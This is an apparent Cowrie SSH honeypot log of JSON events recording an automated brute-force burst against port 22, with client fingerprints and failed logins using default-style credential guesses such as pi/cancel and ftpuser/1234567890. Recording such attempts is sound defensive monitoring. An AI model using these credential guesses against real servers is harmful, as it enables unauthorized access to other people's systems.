{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39464,"dst_ip":"1.2.3.4","dst_port":22,"session":"4269c3443f85","protocol":"ssh","message":"New connection: 87.120.191.13:39464 (1.2.3.4:22) [session: 4269c3443f85]","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.282979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.297265Z","src_ip":"87.120.191.13","session":"4269c3443f85"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.304509Z","src_ip":"87.120.191.13","session":"4269c3443f85"}
{"eventid":"cowrie.login.failed","username":"noc","password":"1234567890","message":"login attempt [noc/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.444782Z","src_ip":"87.120.191.13","session":"4269c3443f85"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.605626Z","src_ip":"87.120.191.13","session":"ef3643956fce"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39476,"dst_ip":"1.2.3.4","dst_port":22,"session":"6030475980cb","protocol":"ssh","message":"New connection: 87.120.191.13:39476 (1.2.3.4:22) [session: 6030475980cb]","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.629506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.652646Z","src_ip":"87.120.191.13","session":"6030475980cb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.653363Z","src_ip":"87.120.191.13","session":"6030475980cb"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.866838Z","src_ip":"87.120.191.13","session":"6030475980cb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.958890Z","src_ip":"87.120.191.13","session":"38660a058046"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39480,"dst_ip":"1.2.3.4","dst_port":22,"session":"a859c11f9d61","protocol":"ssh","message":"New connection: 87.120.191.13:39480 (1.2.3.4:22) [session: a859c11f9d61]","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.985477Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.020021Z","src_ip":"87.120.191.13","session":"9f135c9257a4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.023206Z","src_ip":"87.120.191.13","session":"ac2297b9d7cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.025032Z","src_ip":"87.120.191.13","session":"a859c11f9d61"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.025649Z","src_ip":"87.120.191.13","session":"a859c11f9d61"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39502,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dc83dad24f6","protocol":"ssh","message":"New connection: 87.120.191.13:39502 (1.2.3.4:22) [session: 2dc83dad24f6]","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.048005Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39512,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9c0c87f0de5","protocol":"ssh","message":"New connection: 87.120.191.13:39512 (1.2.3.4:22) [session: a9c0c87f0de5]","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.052780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.074930Z","src_ip":"87.120.191.13","session":"2dc83dad24f6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.075559Z","src_ip":"87.120.191.13","session":"2dc83dad24f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.100636Z","src_ip":"87.120.191.13","session":"a9c0c87f0de5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.101269Z","src_ip":"87.120.191.13","session":"a9c0c87f0de5"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"cancel","message":"login attempt [ubnt/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.263929Z","src_ip":"87.120.191.13","session":"a859c11f9d61"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"cancel","message":"login attempt [ftpuser/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.356949Z","src_ip":"87.120.191.13","session":"2dc83dad24f6"}
{"eventid":"cowrie.login.failed","username":"pi","password":"cancel","message":"login attempt [pi/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.396711Z","src_ip":"87.120.191.13","session":"a9c0c87f0de5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.518605Z","src_ip":"87.120.191.13","session":"4269c3443f85"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39524,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce5450d1cbc0","protocol":"ssh","message":"New connection: 87.120.191.13:39524 (1.2.3.4:22) [session: ce5450d1cbc0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.558025Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59674,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbe91cd249b9","protocol":"ssh","message":"New connection: 212.227.125.160:59674 (1.2.3.4:22) [session: bbe91cd249b9]","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.620244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.629588Z","src_ip":"87.120.191.13","session":"ce5450d1cbc0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.630284Z","src_ip":"87.120.191.13","session":"ce5450d1cbc0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.741156Z","src_ip":"212.227.125.160","session":"bbe91cd249b9"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.741893Z","src_ip":"212.227.125.160","session":"bbe91cd249b9"}
{"eventid":"cowrie.login.failed","username":"noc","password":"cancel","message":"login attempt [noc/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.924705Z","src_ip":"87.120.191.13","session":"ce5450d1cbc0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.974201Z","src_ip":"87.120.191.13","session":"6030475980cb"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39534,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf93cfdbcf28","protocol":"ssh","message":"New connection: 87.120.191.13:39534 (1.2.3.4:22) [session: cf93cfdbcf28]","sensor":"my-vps","timestamp":"2025-08-26T13:58:49.997892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.086479Z","src_ip":"87.120.191.13","session":"cf93cfdbcf28"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.087431Z","src_ip":"87.120.191.13","session":"cf93cfdbcf28"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.353845Z","src_ip":"87.120.191.13","session":"a859c11f9d61"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39554,"dst_ip":"1.2.3.4","dst_port":22,"session":"e040c1a2a273","protocol":"ssh","message":"New connection: 87.120.191.13:39554 (1.2.3.4:22) [session: e040c1a2a273]","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.403011Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.456933Z","src_ip":"87.120.191.13","session":"2dc83dad24f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.468328Z","src_ip":"87.120.191.13","session":"e040c1a2a273"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.469033Z","src_ip":"87.120.191.13","session":"e040c1a2a273"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39556,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d7ae13e663","protocol":"ssh","message":"New connection: 87.120.191.13:39556 (1.2.3.4:22) [session: f3d7ae13e663]","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.483903Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.500620Z","src_ip":"87.120.191.13","session":"a9c0c87f0de5"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"cancel","message":"login attempt [ftpuser/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.513958Z","src_ip":"87.120.191.13","session":"cf93cfdbcf28"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39570,"dst_ip":"1.2.3.4","dst_port":22,"session":"40a8f0141a31","protocol":"ssh","message":"New connection: 87.120.191.13:39570 (1.2.3.4:22) [session: 40a8f0141a31]","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.527203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.570646Z","src_ip":"87.120.191.13","session":"f3d7ae13e663"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.571370Z","src_ip":"87.120.191.13","session":"f3d7ae13e663"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.634902Z","src_ip":"87.120.191.13","session":"40a8f0141a31"}
